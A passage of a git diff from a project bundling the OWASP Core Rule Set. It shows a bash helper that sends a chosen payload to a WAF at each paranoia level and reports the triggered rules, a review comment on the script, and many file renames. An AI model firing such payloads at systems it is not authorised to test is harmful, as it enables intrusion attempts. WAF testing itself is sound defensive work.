+PL4=$(awk "/018,phase:2/,/Paranoia Levels Finished/" $CRS/*.conf |egrep -v "018,phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,')
+
+echo "Sending the following payload at multiple paranoia levels: $PAYLOAD"
+echo
+
+for PL in 1 2 3 4; do
+ echo "--- Paranoia Level $PL ---"
+ echo
+ if [ -f "$PAYLOAD" ]; then
+ curl $protocol://$URL $resolve -k --data-binary "@$PAYLOAD" -H "PL: $PL" -o /dev/null -s
+ else
+ curl $protocol://$URL $resolve -k -d "$PAYLOAD" -H "PL: $PL" -o /dev/null -s
+ fi
+
+ # Here are three ways to get the transaction unique id,
+ # the first one is Christian's format, second is Spartan's format,
+ # and the third one tries to guess which is the unique id using a
+ # regular expression, the first two require specific format.
+ # The automatic format detection may cause the script to malfunction.
+ # Uncomment only the required format.
+ # To use Christian's accesslog format uncomment the following line
+ uniq_id=$(tail -1 $accesslog | cut -d\" -f11 | cut -b2-26)
+
+ # To use Spartan's accesslog format (21 col) uncomment the following line
+ #uniq_id=$(tail -1 $accesslog | awk '{print $21}')
+
+ # To use the automatic unique_id detection uncomment the following line
+ #uniq_id=$(tail -1 $accesslog | egrep -o '[a-zA-Z0-9]{26,28}')
+
+ echo "Tracking unique id: $uniq_id"
+
+ grep $uniq_id $errorlog | sed -e "s/.*\[id \"//" -e "s/\(......\).*\[msg \"/\1 /" -e "s/\"\].*//" -e "s/(Total .*/(Total ...) .../" -e "s/Incoming and Outgoing Score: [0-9]* [0-9]*/Incoming and Outgoing Score: .../" | sed -e "s/$PL1/& PL1/" -e "s/$PL2/& PL2/" -e "s/$PL3/& PL3/ " -e "s/$PL4/& PL4/" | sort -k2 | sed -r "s/^([0-9]+)$/\1 FOREIGN RULE NOT IN CRS/"
+
+ echo
+ echo -n "Total Incoming Score: "
+
+ # Here are two ways to get the transaction anomaly score,
+ # the first one is Christian's format, second is Spartan's format
+ # To use Christian's accesslog format uncomment the following line
+ tail -1 $accesslog | cut -d\" -f11 | cut -d\ -f14 | tr "-" "0"
+
+ # To use Spartan's accesslog format (21 col) uncomment the following line
+ # To use a different column change the $NF value, e.g. $(NF-1)
+ #tail -1 $accesslog | awk '{print $NF}' | tr "-" "0"
+ echo
+done
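Review bot: In the `for PL in 1 2 3 4` loop, `uniq_id` is cut from the last access-log line at a fixed position and then used unquoted in `grep $uniq_id $errorlog`; when the log format differs the id comes out empty, the command degrades to `grep $errorlog` reading standard input, and the script hangs instead of reporting the problem. Guard and quote it: `[ -n "$uniq_id" ] || { echo "no unique id in $accesslog" >&2; continue; }` followed by `grep -F -- "$uniq_id" "$errorlog" | …`, and quote `"$accesslog"` in the `tail` calls as well. Both `curl` invocations also pass `-k` unconditionally, so with `--protocol https` the server certificate is never verified; a comment stating that this is meant for local test targets only, or making it an opt-in option, would make that explicit. The loop condition `[[ $# > 0 ]]` is a string comparison and reads more clearly as `(( $# > 0 ))`.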
diff --git a/src/common/core/modsecurity/files/coreruleset/util/verify.rb b/src/common/core/modsecurity/files/coreruleset-v3/util/verify.rb
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/verify.rb
rename to src/common/core/modsecurity/files/coreruleset-v3/util/verify.rb
diff --git a/src/common/core/modsecurity/files/coreruleset/util/virtual-patching/arachni2modsec.pl b/src/common/core/modsecurity/files/coreruleset-v3/util/virtual-patching/arachni2modsec.pl
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/virtual-patching/arachni2modsec.pl
rename to src/common/core/modsecurity/files/coreruleset-v3/util/virtual-patching/arachni2modsec.pl
diff --git a/src/common/core/modsecurity/files/coreruleset/util/virtual-patching/zap2modsec.pl b/src/common/core/modsecurity/files/coreruleset-v3/util/virtual-patching/zap2modsec.pl
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/virtual-patching/zap2modsec.pl
rename to src/common/core/modsecurity/files/coreruleset-v3/util/virtual-patching/zap2modsec.pl
diff --git a/src/common/core/modsecurity/files/coreruleset/.changes-pending.md b/src/common/core/modsecurity/files/coreruleset-v4/.changes-pending.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.changes-pending.md
rename to src/common/core/modsecurity/files/coreruleset-v4/.changes-pending.md
diff --git a/src/common/core/modsecurity/files/coreruleset/.editorconfig b/src/common/core/modsecurity/files/coreruleset-v4/.editorconfig
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.editorconfig
rename to src/common/core/modsecurity/files/coreruleset-v4/.editorconfig
diff --git a/src/common/core/modsecurity/files/coreruleset/.github/FUNDING.yml b/src/common/core/modsecurity/files/coreruleset-v4/.github/FUNDING.yml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.github/FUNDING.yml
rename to src/common/core/modsecurity/files/coreruleset-v4/.github/FUNDING.yml
diff --git a/src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/01_false-positive.md b/src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/01_false-positive.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/01_false-positive.md
rename to src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/01_false-positive.md
diff --git a/src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/02_false-negative.md b/src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/02_false-negative.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/02_false-negative.md
rename to src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/02_false-negative.md
diff --git a/src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/03_bug-report.md b/src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/03_bug-report.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/03_bug-report.md
rename to src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/03_bug-report.md
diff --git a/src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/04_feature.md b/src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/04_feature.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/04_feature.md
rename to src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/04_feature.md
diff --git a/src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/config.yml b/src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/config.yml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/config.yml
rename to src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/config.yml
diff --git a/src/common/core/modsecurity/files/coreruleset/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md b/src/common/core/modsecurity/files/coreruleset-v4/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md
rename to src/common/core/modsecurity/files/coreruleset-v4/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md
diff --git a/src/common/core/modsecurity/files/coreruleset/.github/create-changelog-prs.py b/src/common/core/modsecurity/files/coreruleset-v4/.github/create-changelog-prs.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.github/create-changelog-prs.py
rename to src/common/core/modsecurity/files/coreruleset-v4/.github/create-changelog-prs.py
diff --git a/src/common/core/modsecurity/files/coreruleset/.github/workflows/check-pr-dependencies.yaml b/src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/check-pr-dependencies.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.github/workflows/check-pr-dependencies.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/check-pr-dependencies.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/.github/workflows/check-pr-title.yaml b/src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/check-pr-title.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.github/workflows/check-pr-title.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/check-pr-title.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/.github/workflows/lint.yaml b/src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/lint.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.github/workflows/lint.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/lint.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/.github/workflows/nightly.yml b/src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/nightly.yml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.github/workflows/nightly.yml
rename to src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/nightly.yml
diff --git a/src/common/core/modsecurity/files/coreruleset/.github/workflows/stale.yml b/src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/stale.yml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.github/workflows/stale.yml
rename to src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/stale.yml
diff --git a/src/common/core/modsecurity/files/coreruleset/.github/workflows/test.yml b/src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/test.yml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.github/workflows/test.yml
rename to src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/test.yml
diff --git a/src/common/core/modsecurity/files/coreruleset/.github/workflows/update-changelog.yaml b/src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/update-changelog.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.github/workflows/update-changelog.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/update-changelog.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/.gitignore b/src/common/core/modsecurity/files/coreruleset-v4/.gitignore
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.gitignore
rename to src/common/core/modsecurity/files/coreruleset-v4/.gitignore
diff --git a/src/common/core/modsecurity/files/coreruleset/.gitmodules b/src/common/core/modsecurity/files/coreruleset-v4/.gitmodules
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.gitmodules
rename to src/common/core/modsecurity/files/coreruleset-v4/.gitmodules
diff --git a/src/common/core/modsecurity/files/coreruleset/.linelint.yml b/src/common/core/modsecurity/files/coreruleset-v4/.linelint.yml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.linelint.yml
rename to src/common/core/modsecurity/files/coreruleset-v4/.linelint.yml
diff --git a/src/common/core/modsecurity/files/coreruleset/.pre-commit-config.yaml b/src/common/core/modsecurity/files/coreruleset-v4/.pre-commit-config.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.pre-commit-config.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/.pre-commit-config.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/.yamllint.yml b/src/common/core/modsecurity/files/coreruleset-v4/.yamllint.yml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/.yamllint.yml
rename to src/common/core/modsecurity/files/coreruleset-v4/.yamllint.yml
diff --git a/src/common/core/modsecurity/files/coreruleset/CHANGES.md b/src/common/core/modsecurity/files/coreruleset-v4/CHANGES.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/CHANGES.md
rename to src/common/core/modsecurity/files/coreruleset-v4/CHANGES.md
diff --git a/src/common/core/modsecurity/files/coreruleset/CONTRIBUTING.md b/src/common/core/modsecurity/files/coreruleset-v4/CONTRIBUTING.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/CONTRIBUTING.md
rename to src/common/core/modsecurity/files/coreruleset-v4/CONTRIBUTING.md
diff --git a/src/common/core/modsecurity/files/coreruleset/CONTRIBUTORS.md b/src/common/core/modsecurity/files/coreruleset-v4/CONTRIBUTORS.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/CONTRIBUTORS.md
rename to src/common/core/modsecurity/files/coreruleset-v4/CONTRIBUTORS.md
diff --git a/src/common/core/modsecurity/files/coreruleset/INSTALL.md b/src/common/core/modsecurity/files/coreruleset-v4/INSTALL.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/INSTALL.md
rename to src/common/core/modsecurity/files/coreruleset-v4/INSTALL.md
diff --git a/src/common/core/modsecurity/files/coreruleset/KNOWN_BUGS.md b/src/common/core/modsecurity/files/coreruleset-v4/KNOWN_BUGS.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/KNOWN_BUGS.md
rename to src/common/core/modsecurity/files/coreruleset-v4/KNOWN_BUGS.md
diff --git a/src/common/core/modsecurity/files/coreruleset/LICENSE b/src/common/core/modsecurity/files/coreruleset-v4/LICENSE
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/LICENSE
rename to src/common/core/modsecurity/files/coreruleset-v4/LICENSE
diff --git a/src/common/core/modsecurity/files/coreruleset/README.md b/src/common/core/modsecurity/files/coreruleset-v4/README.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/README.md
rename to src/common/core/modsecurity/files/coreruleset-v4/README.md
diff --git a/src/common/core/modsecurity/files/coreruleset/SECURITY.md b/src/common/core/modsecurity/files/coreruleset-v4/SECURITY.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/SECURITY.md
rename to src/common/core/modsecurity/files/coreruleset-v4/SECURITY.md
diff --git a/src/common/core/modsecurity/files/coreruleset/SPONSORS.md b/src/common/core/modsecurity/files/coreruleset-v4/SPONSORS.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/SPONSORS.md
rename to src/common/core/modsecurity/files/coreruleset-v4/SPONSORS.md
diff --git a/src/common/core/modsecurity/files/coreruleset/crs-setup.conf.example b/src/common/core/modsecurity/files/coreruleset-v4/crs-setup.conf.example
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/crs-setup.conf.example
rename to src/common/core/modsecurity/files/coreruleset-v4/crs-setup.conf.example
diff --git a/src/common/core/modsecurity/files/coreruleset/docs/README b/src/common/core/modsecurity/files/coreruleset-v4/docs/README
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/docs/README
rename to src/common/core/modsecurity/files/coreruleset-v4/docs/README
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/920100.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920100.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/920100.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920100.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/920120.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920120.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/920120.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920120.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/920220-chain1.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920220-chain1.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/920220-chain1.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920220-chain1.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/920221.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920221.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/920221.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920221.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/920260.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920260.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/920260.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920260.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/920521.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920521.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/920521.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920521.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/920600.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920600.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/920600.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920600.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/921421.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/921421.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/921421.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/921421.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/921422.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/921422.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/921422.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/921422.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/922110-chain1.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/922110-chain1.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/922110-chain1.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/922110-chain1.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/930100.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/930100.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/930100.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/930100.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/931130.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/931130.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/931130.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/931130.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/931131.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/931131.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/931131.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/931131.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932125.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932125.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932125.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932125.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932130.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932130.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932130.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932130.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932131.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932131.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932131.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932131.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932140.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932140.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932140.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932140.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932175.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932175.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932175.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932175.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932200.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932200.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932200.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932200.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932205.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932205.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932205.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932205.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932206.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932206.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932206.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932206.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932210.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932210.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932210.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932210.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932220.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932220.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932220.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932220.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932230.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932230.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932230.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932230.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932231.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932231.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932231.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932231.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932232.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932232.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932232.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932232.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932235.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932235.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932235.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932235.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932236.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932236.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932236.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932236.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932237.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932237.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932237.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932237.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932238.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932238.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932238.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932238.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932239.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932239.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932239.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932239.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932240.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932240.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932240.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932240.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932250.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932250.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932250.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932250.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932260.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932260.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932260.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932260.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932300.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932300.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932300.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932300.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932301.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932301.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932301.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932301.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932310.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932310.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932310.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932310.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932311.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932311.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932311.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932311.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932320.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932320.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932320.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932320.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932321.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932321.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932321.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932321.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932370.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932370.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932370.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932370.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932380.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932380.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932380.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932380.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/933131.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933131.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/933131.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933131.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/933160.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933160.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/933160.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933160.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/933161.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933161.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/933161.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933161.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/933200.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933200.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/933200.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933200.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/933210.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933210.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/933210.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933210.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/933211.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933211.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/933211.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933211.ra
